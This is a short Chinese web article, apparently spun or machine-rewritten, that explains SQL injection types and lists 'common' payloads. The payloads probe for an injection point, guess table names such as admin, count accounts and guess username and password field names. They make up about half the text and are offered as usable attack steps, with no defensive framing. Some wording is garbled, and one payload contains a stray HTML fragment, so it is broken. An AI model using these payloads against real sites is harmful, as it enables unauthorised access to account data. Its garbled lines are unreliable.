sql注入语句是怎样的? sql注入语句


sql注入句子是什么样让我们一起来看看:
sql注入句实际上可以分为三种 , 即数字注入点 , 句子通常是select * from表名where id=1 and 1=1;字符注入点 , 句子一般为select * from表名where name...;搜索注入点 。
而sql即通过将注入SQL命令插入到Web提交表格或输入域名和页面请求的查询字符串 , 最终欺骗服务器恶意执行SQL命令 。
sql注入类型通常可以以不同的方式进行分类 。例如 , 如果按注入点类型进行分类 , 可分为数字注入点、字符注入点和搜索注入点 。如果按数据提交的方式进行分类 , 可分为get 注入、Post 注入、Cookie 注入、HTTP 注入头部 。
当然也可以根据执行效果进行分类 , 可以分为基于布尔的盲注、基于时间的盲注、基于报错注、联合查询注 。
常用的句子有:
1、判断是否有注入点
; and 1=1 and 1=2
2、猜表 通常表的名称基本上是admin adminuser user pAss password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断它是否存在admin这张表
【sql注入语句是怎样的? sql注入语句】3、如果遇到猜账号数量 0< 返回正确的页面 1<返回错误页面意味着账户数量是一个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4、猜测字段名称 在len()括号中可以添加所想到的字段名称 。
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
以上是小编的分享 , 希望对大家有所帮助 。